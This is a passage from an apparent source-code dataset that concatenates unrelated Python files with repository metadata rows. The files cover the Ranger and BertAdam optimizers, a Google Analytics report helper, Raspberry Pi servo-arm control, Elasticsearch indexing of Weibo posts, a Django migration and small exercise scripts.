    """Ranger — a synergistic optimizer combining RAdam (Rectified Adam) and
    Lookahead in one codebase.

    Notes from the original author:
        1 - Ranger was used to beat the high scores for 12 different categories
            on the FastAI leaderboards (previous records held with AdamW).
        2 - Recommended together with the Mish activation and a flat + cosine
            anneal training curve.
        3 - beta1 (momentum) of .95 was found to work better than .90
            (i.e. betas=(0.95, 0.999)).

    Look-ahead (slow) weights are kept in the per-parameter state dict so they
    survive save/load without leaving stale tensors in GPU memory.

    Example:
        >>> model = ResNet()
        >>> optimizer = Ranger(model.parameters(), lr=0.001)
    """

    def __init__(self, params, lr=1e-3, alpha=0.5, k=6, N_sma_threshhold=5,
                 betas=(.95, 0.999), eps=1e-5, weight_decay=0):
        # Parameter checks. N_sma_threshhold of 5 tested better than 4, but it
        # is worth validating per-dataset.
        if not 0.0 <= alpha <= 1.0:
            raise ValueError(f'Invalid slow update rate: {alpha}')
        if not 1 <= k:
            raise ValueError(f'Invalid lookahead steps: {k}')
        if not lr > 0:
            raise ValueError(f'Invalid Learning Rate: {lr}')
        if not eps > 0:
            raise ValueError(f'Invalid eps: {eps}')
        defaults = dict(lr=lr, alpha=alpha, k=k, step_counter=0, betas=betas,
                        N_sma_threshhold=N_sma_threshhold, eps=eps, weight_decay=weight_decay)
        super().__init__(params, defaults)
        # Adjustable rectification threshold.
        self.N_sma_threshhold = N_sma_threshhold
        # Look-ahead params.
        self.alpha = alpha
        self.k = k
        # Shared cache of (step, N_sma, step_size), keyed by step % 10, so the
        # rectification term is computed once per step rather than per tensor.
        self.radam_buffer = [[None, None, None] for ind in range(10)]

    def __setstate__(self, state):
        # (Removed a leftover debug print that fired on every checkpoint load.)
        super(Ranger, self).__setstate__(state)

    def step(self, closure=None):
        loss = None
        # NOTE: upstream deliberately does not evaluate `closure` here (their
        # training loop passes the loss back as a float, not a callable); the
        # argument is kept for torch.optim.Optimizer API compatibility.
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data.float()
                if grad.is_sparse:
                    raise RuntimeError('Ranger optimizer does not support sparse gradients')
                p_data_fp32 = p.data.float()
                state = self.state[p]  # get state dict for this param
                if len(state) == 0:
                    # First run for this tensor: init moments and the
                    # look-ahead slow buffer (stored in state for save/load).
                    state['step'] = 0
                    state['exp_avg'] = torch.zeros_like(p_data_fp32)
                    state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
                    state['slow_buffer'] = torch.empty_like(p.data)
                    state['slow_buffer'].copy_(p.data)
                else:
                    state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
                    state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                beta1, beta2 = group['betas']
                # Moment updates. Keyword overloads replace the legacy
                # positional-scalar forms removed from recent PyTorch releases.
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                state['step'] += 1
                buffered = self.radam_buffer[int(state['step'] % 10)]
                if state['step'] == buffered[0]:
                    N_sma, step_size = buffered[1], buffered[2]
                else:
                    buffered[0] = state['step']
                    beta2_t = beta2 ** state['step']
                    N_sma_max = 2 / (1 - beta2) - 1
                    N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
                    buffered[1] = N_sma
                    if N_sma > self.N_sma_threshhold:
                        step_size = math.sqrt(
                            (1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2)
                            / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
                    else:
                        step_size = 1.0 / (1 - beta1 ** state['step'])
                    buffered[2] = step_size
                if group['weight_decay'] != 0:
                    p_data_fp32.add_(p_data_fp32, alpha=-group['weight_decay'] * group['lr'])
                if N_sma > self.N_sma_threshhold:
                    # Rectified (adaptive) step.
                    denom = exp_avg_sq.sqrt().add_(group['eps'])
                    p_data_fp32.addcdiv_(exp_avg, denom, value=-step_size * group['lr'])
                else:
                    # Unrectified momentum step.
                    p_data_fp32.add_(exp_avg, alpha=-step_size * group['lr'])
                p.data.copy_(p_data_fp32)
                # Integrated look-ahead, applied per parameter tensor.
                if state['step'] % group['k'] == 0:
                    slow_p = state['slow_buffer']  # get access to slow param tensor
                    # slow <- slow + alpha * (fast - slow)
                    slow_p.add_(p.data - slow_p, alpha=self.alpha)
                    p.data.copy_(slow_p)  # copy interpolated weights back
        return loss
class BertAdam(Optimizer):
    """Implements BERT version of Adam algorithm with weight decay fix.

    Relies on the module-level ``SCHEDULES`` mapping (warmup schedule name ->
    function) and ``clip_grad_norm_`` defined/imported elsewhere in this module.

    Params:
        lr: learning rate
        warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
        t_total: total number of training steps for the learning
            rate schedule, -1 means constant learning rate. Default: -1
        schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
        b1: Adams b1. Default: 0.9
        b2: Adams b2. Default: 0.999
        e: Adams epsilon. Default: 1e-6
        weight_decay: Weight decay. Default: 0.01
        max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
    """

    def __init__(self, params, lr, warmup=-1, t_total=-1, schedule='warmup_linear',
                 b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
                 max_grad_norm=1.0):
        if lr < 0.0:
            raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
        if schedule not in SCHEDULES:
            raise ValueError("Invalid schedule parameter: {}".format(schedule))
        if not 0.0 <= warmup < 1.0 and not warmup == -1:
            raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
        if not 0.0 <= b1 < 1.0:
            raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
        if not 0.0 <= b2 < 1.0:
            raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
        if not e >= 0.0:
            raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
        defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
                        b1=b1, b2=b2, e=e, weight_decay=weight_decay,
                        max_grad_norm=max_grad_norm)
        super(BertAdam, self).__init__(params, defaults)

    def get_lr(self):
        """Return the current scheduled learning rate for every parameter.

        Returns ``[0]`` if no step has been taken yet.
        """
        lr = []
        for group in self.param_groups:
            for p in group['params']:
                state = self.state[p]
                if len(state) == 0:
                    return [0]
                if group['t_total'] != -1:
                    schedule_fct = SCHEDULES[group['schedule']]
                    lr_scheduled = group['lr'] * schedule_fct(state['step'] / group['t_total'], group['warmup'])
                else:
                    lr_scheduled = group['lr']
                lr.append(lr_scheduled)
        return lr

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
                state = self.state[p]
                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['next_m'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['next_v'] = torch.zeros_like(p.data)
                next_m, next_v = state['next_m'], state['next_v']
                beta1, beta2 = group['b1'], group['b2']
                # Add grad clipping
                if group['max_grad_norm'] > 0:
                    clip_grad_norm_(p, group['max_grad_norm'])
                # Decay the first and second moment running average coefficient.
                # In-place; keyword overloads replace the legacy
                # positional-scalar forms removed from recent PyTorch releases.
                next_m.mul_(beta1).add_(grad, alpha=1 - beta1)
                next_v.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                update = next_m / (next_v.sqrt() + group['e'])
                # Just adding the square of the weights to the loss function is *not*
                # the correct way of using L2 regularization/weight decay with Adam,
                # since that will interact with the m and v parameters in strange ways.
                #
                # Instead we want to decay the weights in a manner that doesn't interact
                # with the m/v parameters. This is equivalent to adding the square
                # of the weights to the loss with plain (non-momentum) SGD.
                if group['weight_decay'] > 0.0:
                    update += group['weight_decay'] * p.data
                if group['t_total'] != -1:
                    schedule_fct = SCHEDULES[group['schedule']]
                    lr_scheduled = group['lr'] * schedule_fct(state['step'] / group['t_total'], group['warmup'])
                else:
                    lr_scheduled = group['lr']
                update_with_lr = lr_scheduled * update
                p.data.add_(-update_with_lr)
                # NOTE: step is incremented *after* the update, matching the
                # original BERT implementation (no bias correction).
                state['step'] += 1
        return loss
"1436496575@qq.com"
] | 1436496575@qq.com |
f06b4285ad8b969fb731db92a977644afcf202e1 | ad19975b9c86d5bb29d3c402e8ac55838bac78ba | /GA_project/ga_luis_report.py | a3d7463ec98a35f85992999bbf3a0967c9749aff | [] | no_license | data-skeptic/bot-survey-engine | 4053643a4fc3a714d8dabd55f3baefc6011ddadb | 724cc5f8a7dc245b9129abc7df7e306d6cea501a | refs/heads/master | 2021-01-16T18:11:13.569192 | 2017-12-01T23:43:18 | 2017-12-01T23:43:18 | 100,050,018 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,620 | py | import json
import os
import time
import boto3
import numpy as np
import sys
import pandas as pd
import matplotlib.pyplot as plt
#import parsedatetime as pdt # $ pip install parsedatetime
import requests
from tabulate import tabulate
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
from gahelper.gahelper import Gahelper
from gahelper.gaformatter import format_dataframe
from datetime import datetime
from datetime import timedelta
class ga_report():
    """Answer Google Analytics questions: validate the extracted LUIS items,
    run the GA query via Gahelper, and format the result for the bot.

    NOTE(review): the original file's indentation was lost; nesting below is
    reconstructed from the branch structure — confirm against the repository.
    """

    def __init__(self):
        # Directory of this source file; config lives one level up.
        self.dir_path = os.path.dirname(os.path.realpath(__file__))
        # print("/".join(self.dir_path.split("/")[0:-1]) + "/config/config.json")
        config = json.load(open("/".join(self.dir_path.split("/")[0:-1]) + "/config/config.json"))
        # AWS credentials / bucket for uploading rendered charts.
        self.key = config['aws']['accessKeyId']
        self.secret = config['aws']['secretAccessKey']
        self.bucketname = config['aws']['bucket_name']
        self.s3 = boto3.resource('s3', aws_access_key_id=self.key, aws_secret_access_key=self.secret)
        self.config = config
        # LUIS (language understanding) credentials.
        self.luis_app_id = config['luis']['app_id']
        self.luis_subscription_key = config['luis']['subscription_key']
        # Flatten all known GA dimensions from data/dimensions.json into one list.
        self.standard_dims = []
        with open(self.dir_path + "/data/dimensions.json") as f:
            data = json.load(f)
            for key, value in data.items():
                self.standard_dims = self.standard_dims + value
        # Same for metrics.
        self.standard_metrics = []
        with open(self.dir_path + "/data/metrics.json") as f:
            data = json.load(f)
            for key, value in data.items():
                self.standard_metrics = self.standard_metrics + value
        return

    # gahelper
    def get_google_analytics(self, GA_items):
        """Run the GA query described by GA_items and return a dict with
        'img' (chart URL or "") and 'txt' (text answer or error message)."""
        ga = Gahelper(self.config)
        print("GA_items in get_google_analytics is ", GA_items)
        if not GA_items.get('standard_metrics'):
            f = {'img': "", 'txt': ""}
        if not GA_items.get('start'):  # start is missing
            if GA_items.get('end'):  # end is not missing
                f = {'img': "", 'txt': "start missing"}
            else:
                f = {'img': "", 'txt': "date range is missing."}
        else:  # start is not missing
            if not GA_items.get('end'):  # end is missing
                f = {'img': "", 'txt': "end missing"}
            else:
                metrics = GA_items.get('standard_metrics', [])
                dimensions = GA_items.get('standard_dims', [])
                if len(GA_items.get('start')) == 1:
                    start_date = str(GA_items.get('start')[-1])
                    end_date = str(GA_items.get('end')[-1])
                else:
                    # if there are more than one pair of start and end, which one is right? Or need to combine all/both pairs?
                    # for the moment, use the last one. It is more likely to be the right one. For example, how many sessions per month in 2017? Then ['month', '2017'] will be returned. use the last one '2017'.
                    start_date = str(GA_items.get('start')[-1])
                    end_date = str(GA_items.get('end')[-1])
                print(metrics, dimensions, start_date, end_date)
                report = ga.get_report(metrics, dimensions, start_date, end_date)
                print(tabulate(report, headers='keys', tablefmt='psql'))
                # Renders the dataframe and uploads the image to S3.
                f = format_dataframe(self.s3, self.bucketname, report, metrics, dimensions, start_date, end_date)
                print(f)
        return f

    def run(self, GA_items):
        """Entry point: dispatch on which GA items are present.

        Requires metrics, start and end; otherwise returns an error message
        (empty when metrics are missing — the caller handles that case).
        """
        if GA_items.get('standard_metrics'):
            if GA_items.get('start'):
                if GA_items.get('end'):
                    f = self.get_google_analytics(GA_items)
                else:
                    # NOTE(review): trailing apostrophe inside this user-facing
                    # message looks like a typo — left unchanged here.
                    f = {'img': "", 'txt': "end missing'"}
            elif GA_items.get('end'):
                f = {'img': "", 'txt': "start missing"}
            else:
                f = {'img': "", 'txt': "date range missing"}
        else:
            f = {'img': "", 'txt': ""}
        return f
# def test_run(user_request):
# ga_instance = ga()
# ga_instance.run(user_request)
# user_request = "What is the ad cost per week in January last year?"
# test_run(user_request)
# Script entry point — intentionally a no-op; ga_report is used as a library.
if __name__ == '__main__':
    pass
| [
"xfzhengnankai@gmail.com"
] | xfzhengnankai@gmail.com |
013a7e49d621e0e28d78cb0bc663558c82c505e6 | 76d658c1d033b93ec3c7fe7296eaa2078eb329f9 | /derc_2019/tagi/armWithTread2.py | 921c970dab87c686ada300dc8faa2b5eb035a314 | [] | no_license | DERC-code/derc_2020 | 04a499b28fb2807b4269c606e93b5e45df158882 | af1afdc3db4df76547aff52c389430270c447778 | refs/heads/master | 2023-01-11T11:26:17.668508 | 2020-11-14T05:41:45 | 2020-11-14T05:41:45 | 312,753,103 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,216 | py | import RPi.GPIO as GPIO
import time
import numpy as np
import math
import threading
# Link lengths of the two arm segments (units follow the target coordinates).
L1 = 180
L2 = 140
# Default target coordinates for the arm tip, used by main().
locationX = 100
locationY = 100
locationZ = 0


def calc(x, y, z):
    """Inverse kinematics for the 2-link arm.

    Given a target point (x, y, z), return ``[rad1, servorad2, servorad3]``:
    the base rotation and the two joint angles remapped to servo coordinates
    (0 rad = the servo's neutral position at pi/2).
    """
    Ld = np.sqrt((x ** 2) + (y ** 2) + (z ** 2))
    rad1 = math.atan2(y, x)
    # Law of cosines for the shoulder joint; clamp the cosine/sine arguments
    # to [-1, 1] to guard against unreachable targets and float drift.
    radFor2 = ((L1 ** 2) + (Ld ** 2) - (L2 ** 2)) / (2 * L1 * Ld)
    if radFor2 > 1:
        radFor2 = 1
    elif radFor2 < -1:
        radFor2 = -1
    radFor3 = ((Ld ** 2) - (L1 ** 2) - (L2 ** 2)) / (2 * L1 * L2)
    if radFor3 > 1:
        radFor3 = 1
    elif radFor3 < -1:
        radFor3 = -1
    rad2 = math.acos(radFor2) + math.atan2(z, np.sqrt((x ** 2) + (y ** 2)))
    rad3 = math.asin(radFor3) + (np.pi / 2)
    # Map the shoulder angle to servo coordinates relative to the pi/2 pose.
    if 0 <= rad2 and rad2 < (np.pi / 2):
        servorad2 = (np.pi / 2) - rad2
    elif (np.pi / 2) <= rad2 and rad2 <= np.pi:
        servorad2 = -(np.pi - rad2)
    else:
        servorad2 = 0
    # When moving continuously, keeping the previous value would be better here.
    if 0 <= rad3 and rad3 < (np.pi / 2):
        servorad3 = (np.pi / 2) - rad3
    elif (np.pi / 2) <= rad3 and rad3 <= np.pi:
        # BUG FIX: this branch previously computed -(np.pi - rad2) — a
        # copy-paste from the servorad2 mapping above; it must use rad3.
        servorad3 = -(np.pi - rad3)
    else:
        servorad3 = 0
    # Same as above: keep the previous value when moving continuously.
    return [rad1, servorad2, servorad3]
def runServo1(servo1, arg1):
    # Convert the commanded angle [rad] to a PWM duty cycle and drive servo 1.
    duty = arg1 * (9.5 / np.pi) + 7.25
    servo1.start(0.0)
    servo1.ChangeDutyCycle(duty)
    time.sleep(0.3)  # give the servo time to reach the position
    servo1.stop()
def runServo2(servo2, arg2):
    # Convert the commanded angle [rad] to a PWM duty cycle and drive servo 2.
    duty = arg2 * (9.5 / np.pi) + 7.25
    servo2.start(0.0)
    servo2.ChangeDutyCycle(duty)
    time.sleep(0.3)  # give the servo time to reach the position
    servo2.stop()
def runServo3(servo3, arg3):
    # Convert the commanded angle [rad] to a PWM duty cycle and drive servo 3.
    duty = arg3 * (9.5 / np.pi) + 7.25
    servo3.start(0.0)
    servo3.ChangeDutyCycle(duty)
    time.sleep(0.3)  # give the servo time to reach the position
    servo3.stop()
def main():
    """Drive the 3-servo arm once: move all joints to a hard-coded target
    in parallel, then release the PWM channels and clean up the GPIO pins."""
    # BCM pin numbering; one GPIO pin per servo channel.
    GPIO.setmode(GPIO.BCM)
    gp_out1 = 17
    gp_out2 = 27
    gp_out3 = 22
    GPIO.setup(gp_out1, GPIO.OUT)
    GPIO.setup(gp_out2, GPIO.OUT)
    GPIO.setup(gp_out3, GPIO.OUT)
    # 50 Hz is the standard hobby-servo PWM frame rate.
    servo1 = GPIO.PWM(gp_out1, 50)
    servo2 = GPIO.PWM(gp_out2, 50)
    servo3 = GPIO.PWM(gp_out3, 50)
    servo1.start(0.0)
    servo2.start(0.0)
    servo3.start(0.0)
    # Inverse kinematics for the default target (z offset by -20).
    args = calc(locationX, locationY, locationZ - 20)
    print(args)
    # 57.2958 = degrees per radian, for human-readable output.
    print(args[0] * 57.2958)
    print(args[1] * 57.2958)
    print(args[2] * 57.2958)
    # BUG FIX: the original used Thread(target=runServo1(servo1, args[0])),
    # which CALLS runServo1 immediately and hands its return value (None) to
    # Thread — the moves ran sequentially and the threads were no-ops.
    # Passing the callable plus args makes the three servos move in parallel.
    thread_1 = threading.Thread(target=runServo1, args=(servo1, args[0]))
    thread_2 = threading.Thread(target=runServo2, args=(servo2, args[1]))
    thread_3 = threading.Thread(target=runServo3, args=(servo3, args[2]))
    thread_1.start()
    thread_2.start()
    thread_3.start()
    # Each move takes ~0.3 s; 1 s comfortably covers all three threads.
    time.sleep(1)
    servo1.stop()
    servo2.stop()
    servo3.stop()
    GPIO.cleanup()


if __name__ == "__main__":
    main()
| [
"49942962+tagiituki@users.noreply.github.com"
] | 49942962+tagiituki@users.noreply.github.com |
ffd8d7f924ac71a1fcbac5e43212d5d188bd3f80 | cfc02900c2d46bc92388014a6c633589ea5e6862 | /SMSBazaarCore/migrations/0007_auto_20200927_1715.py | 58ab3d6823556c8beb44bfb0a7fe4d37487350af | [] | no_license | AlexandrosAliKhan/SMS-Bazaar | e8d6173c389aad37fa97c704617a0dfd936726f2 | 5eef06c908e9de0a73f5044e0c9c2e4bd9340ce1 | refs/heads/master | 2022-12-21T23:55:29.566705 | 2020-09-27T16:45:40 | 2020-09-27T16:45:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | # Generated by Django 3.1.1 on 2020-09-27 14:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('SMSBazaarCore', '0006_item_vendor_ph_num'),
]
operations = [
migrations.RenameField(
model_name='item',
old_name='amount',
new_name='price',
),
]
| [
"axk1168@miami.edu"
] | axk1168@miami.edu |
819d89ad9b84dc64e53285ec72e4fee0a37decf8 | 6ceb45b74c581b5391cfd35a4a545222305175f3 | /0x0B-python-input_output/2-read_lines.py | 160e0ec606730cf2b90c907395838a96a28d973f | [] | no_license | drc288/holbertonschool-higher_level_programming | 8d8016d342f4fdac888f6f423c4e421eacc5bb6f | 6bd553b0f3711d5ef511a48551864cee598fe186 | refs/heads/master | 2020-07-22T23:58:55.696222 | 2020-02-14T00:30:16 | 2020-02-14T00:30:16 | 207,375,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | #!/usr/bin/python3
def read_lines(filename="", nb_lines=0):
    """Print lines from a UTF-8 text file.

    Args:
        filename (str): path of the file to read.
        nb_lines (int): number of lines to print; if <= 0 the whole
            file is printed.
    """
    with open(filename, encoding="utf-8") as f:
        if nb_lines <= 0:
            print(f.read(), end="")
        else:
            # Iterate the file lazily instead of calling readline() in a
            # counted loop; stops cleanly if the file has fewer lines.
            for i, line in enumerate(f):
                if i >= nb_lines:
                    break
                print(line, end="")
| [
"davidroserocalle@gmail.com"
] | davidroserocalle@gmail.com |
6f20459b270ef8675b3858dc7ce711498a9e41c0 | 0472a11cf845be4f0f012fe40840e808875e04e9 | /bunkai/__init__.py | 3e1e90112db7d3dc3d36466b723c837bd7f8d614 | [
"Apache-2.0"
] | permissive | t-yamamura/bunkai | e4613a2c7eabe0cbb8660df3f0a4abe1e3375fc3 | 6a6da28329fbdde2a53176740d403ef96fab4f28 | refs/heads/main | 2023-06-15T00:20:02.181194 | 2021-07-07T00:42:55 | 2021-07-07T00:42:55 | 384,068,722 | 0 | 0 | Apache-2.0 | 2021-07-08T09:18:17 | 2021-07-08T09:18:16 | null | UTF-8 | Python | false | false | 150 | py | #!/usr/bin/env python3
from bunkai.algorithm.bunkai_sbd.bunkai_sbd import \
BunkaiSentenceBoundaryDisambiguation as Bunkai
__all__ = ['Bunkai']
| [
"yuta@hayashibe.jp"
] | yuta@hayashibe.jp |
7bb49342cb73134944d8a28f2c9d9644e7a2b854 | 073d30f4c9696125aeab0f887c1ae718233b67f6 | /boot.py | 28cde50d3ae0900f7c26ee5fcd49d4518f340fd7 | [] | no_license | senabo/diploma_esp | 0cef2f7fabf4064a084ceb8f44a9ee41c21eb472 | ee023cf294446b60e25be28469a8e0876fc0ba1e | refs/heads/master | 2022-11-06T07:18:31.939764 | 2020-06-23T19:00:22 | 2020-06-23T19:00:22 | 243,744,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | # This file is executed on every boot (including wake-boot from deepsleep)
# import esp
# esp.osdebug(None)
# import uos, machine, os
# uos.dupterm(None, 1) # disable REPL on UART(0)
import gc
# import webrepl
#
# webrepl.start()
#
gc.collect()
| [
"senabo33@gmail.com"
] | senabo33@gmail.com |
4a15b179983653f258889da66e12363550493cb6 | 5216d6ff0920e8efbca7c754006b3dea0548d034 | /myfirst/apps/shop/apps.py | 82d98870983493fa80eff29140d6759413364b2b | [] | no_license | VanyaZheltov/ubiquitous-palm-tree | e1c961f9ef473881c53ecd6a1460c79fd17ba7ed | bb95d1a89daede1d64295fe70503120644e485e7 | refs/heads/master | 2023-01-04T22:42:01.263730 | 2020-11-07T10:54:17 | 2020-11-07T10:54:17 | 294,415,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from django.apps import AppConfig
class ShopConfig(AppConfig):
    # Django app configuration for the shop application.
    name = 'shop'
    # Display name shown in the Django admin (Russian for "Shop").
    verbose_name = 'Магазин'
| [
"zheltov86@live.ru"
] | zheltov86@live.ru |
8b218c6720db3557dc926056565b84482efb1e37 | 0030ce9ebd268c751c6358ac9637b934f255767f | /apile/wsgi.py | 3d94036f34444367a8adfaebae7ef429ed3280e3 | [] | no_license | momentum-cohort-2018-10/w5-apile-mo-tiana | f943f811c20e8df7f9329b0421baa31cda665403 | 669f4416845f92f4a558cf66a9c990ba977957ec | refs/heads/master | 2020-04-08T08:59:53.522230 | 2018-12-03T16:14:37 | 2018-12-03T16:14:37 | 159,202,994 | 1 | 2 | null | 2018-12-03T16:14:47 | 2018-11-26T16:54:26 | HTML | UTF-8 | Python | false | false | 387 | py | """
WSGI config for apile project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'apile.settings')
application = get_wsgi_application()
| [
"meagabeth@icloud.com"
] | meagabeth@icloud.com |
81ade5278aeab0a1197c12c2bde8a62122fad070 | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/cron/attribute/filter_sensitive_uid_text.py | d49971916dc61266df2f85bbccec815232885978 | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 4,249 | py | # -*- coding: utf-8 -*-
import csv
import os
import sys
import time
from elasticsearch import Elasticsearch
from DFA_filter import sensitive_words_extract
reload(sys)
sys.path.append('./../flow1/')
from csv2json import itemLine2Dict, csv2bin
sys.setdefaultencoding('utf-8')
# Error log for failed Elasticsearch writes.
f_file = open('es_error.txt', 'wb')
# Directory of raw weibo CSV dumps to index.
CSV_FILE_PATH = '/home/ubuntu8/data1309/20130901'
uid_csv_path = './../recommend_in/'
uid_csv = 'sensitive_uid_list.txt'
es = Elasticsearch('219.224.135.93:9206')
count_n = 0
tb = time.time()
# Load the set of sensitive uids (one per line).
uid_set = set()
with open (os.path.join(uid_csv_path, uid_csv), 'rb') as t:
    for line in t:
        uid = line.strip()
        uid_set.add(uid)
        count_n += 1
# CSV writer kept for the (currently disabled) file-output path below.
uid_text = file('sensitive_uid_text_1.csv', 'wb')
writer = csv.writer(uid_text)
count = 0
count_f = 0
bulk_action = []
file_list = set(os.listdir(CSV_FILE_PATH))
print "total file is ", len(file_list)
# Walk every raw dump file, convert each line into a weibo record and
# bulk-index sensitive posts (sp_type == 1) into the weibo_text ES index.
# NOTE: Python 2 code (print statements, `except Exception, r`).
for each in file_list:
    with open(os.path.join(CSV_FILE_PATH, each), 'rb') as f:
        try:
            for line in f:
                count_f += 1
                weibo_item = itemLine2Dict(line)
                if weibo_item:
                    weibo_item_bin = csv2bin(weibo_item)
                    # Only keep sensitive posts.
                    if int(weibo_item_bin['sp_type']) != 1:
                        continue
                    #if not str(weibo_item_bin['uid']) in uid_set:
                    #    continue
                    text = weibo_item_bin['text']
                    message_type = 0
                    # message_type: 1 = original, 2 = repost (strip the
                    # forward chain after '//@'), 3 = comment.
                    if weibo_item_bin['message_type'] == 1:
                        write_text = text
                        message_type = 1
                    elif weibo_item_bin['message_type'] == 2:
                        temp = text.split('//@')[0].split(':')[1:]
                        write_text = ''.join(temp)
                        message_type = 2
                    elif weibo_item_bin['message_type'] == 3:
                        write_text = text
                        message_type = 3
                    else:
                        continue
                    if not isinstance(write_text, str):
                        text = text.encode('utf-8', 'ignore')
                    '''
                    if text:
                        sw_dict = sensitive_words_extract(text)
                        if not sw_dict:
                            sensitive = 0
                        else:
                            seneitive = 1
                    '''
                    origin_text = weibo_item_bin['text'].encode('utf-8', 'ignore')
                    item = [str(weibo_item_bin['uid']), str(weibo_item_bin['mid']), str(weibo_item_bin['send_ip']), str(weibo_item_bin['timestamp']), message_type, str(weibo_item_bin['root_uid']), str(weibo_item_bin['root_mid']), origin_text ]
                    key_list = ['uid', 'mid', 'ip', 'timestamp', 'message_type','root_uid', 'root_mid', 'text']
                    item_dict = dict()
                    for i in range(len(key_list)):
                        item_dict[key_list[i]] = item[i]
                    # Use the weibo mid as the ES document id.
                    _id = item[1]
                    action = {'index': {'_id': _id}}
                    bulk_action.extend([action, item_dict])
                    count += 1
                    # Flush to Elasticsearch every 1000 indexed records.
                    if count % 1000 == 0:
                        if bulk_action:
                            es.bulk(bulk_action, index='weibo_text', doc_type='text', timeout=30)
                            bulk_action = []
                    '''
                    except Exception, r:
                        time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
                        f_file.write(time_date + '\t' + r + '\n')
                    '''
                    print count, count_f
                    #if write_text != "":
                    #    writer.writerow(item)
                    #    count += 1
                    # Progress report every 10k input lines.
                    if count_f % 10000 == 0:
                        ts = time.time()
                        print "%s per %s second" %(count_f, ts-tb)
                        print "have get %s" % count
                        tb = ts
        except SystemError:
            print "system error"
        except Exception, r:
            print Exception, r
# NOTE(review): any records still in bulk_action (< 1000 tail) are printed
# but never flushed to ES here.
print bulk_action
| [
"1257819385@qq.com"
] | 1257819385@qq.com |
08c9ef333e0f6b35aa3d5c8d6bfc3f853730ff9b | 53bec46772d2bfce166970fc5f3ac3c4b5ec1d12 | /math_print.py | 43ed6c5fa387fd1715e57ed4fcc301e4457d5a03 | [] | no_license | lappazos/Intro_Ex_1_Turtle | b1155d7b78bbc3db1755da85a22661b0fd87e9a6 | 7fc9cf0ea877da2461d247da48474e5c1943bc5b | refs/heads/master | 2020-04-05T04:02:58.580281 | 2018-11-07T11:24:19 | 2018-11-07T11:24:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #############################################################################
# FILE : math_print.py
# WRITER : Lior Paz, lioraryepaz, 206240996
# EXERCISE : intro2cs ex1 2017-2018
# DESCRIPTION : a program that prints out different math values using math
# functions.
#############################################################################
# The next line imports math module into the program
import math
def golden_ratio():
    """Print the golden ratio, (1 + sqrt(5)) / 2."""
    phi = (1 + math.sqrt(5)) / 2
    print(phi)
def six_square():
    """Print six squared as a float (same output as math.pow(6, 2))."""
    print(6.0 ** 2)
def hypotenuse():
    """Print the hypotenuse of a right triangle with legs 5 and 12.

    Uses math.hypot, the standard-library Euclidean-norm helper, instead
    of a hand-rolled sqrt of summed squares.  Prints 13.0.
    """
    print(math.hypot(12, 5))
def pi():
    """Print the mathematical constant pi."""
    value = math.pi
    print(value)
def e():
    """Print Euler's number, the mathematical constant e."""
    value = math.e
    print(value)
def squares_area():
    """Print the areas of squares with side lengths 1 through 10.

    Output matches the original hard-coded version exactly:
    1 4 9 16 25 36 49 64 81 100
    """
    # Generate the squares instead of hard-coding ten products.
    print(*(side * side for side in range(1, 11)))
# Demo: invoke each printer defined above, in definition order.
golden_ratio()
six_square()
hypotenuse()
pi()
e()
squares_area()
"noreply@github.com"
] | lappazos.noreply@github.com |
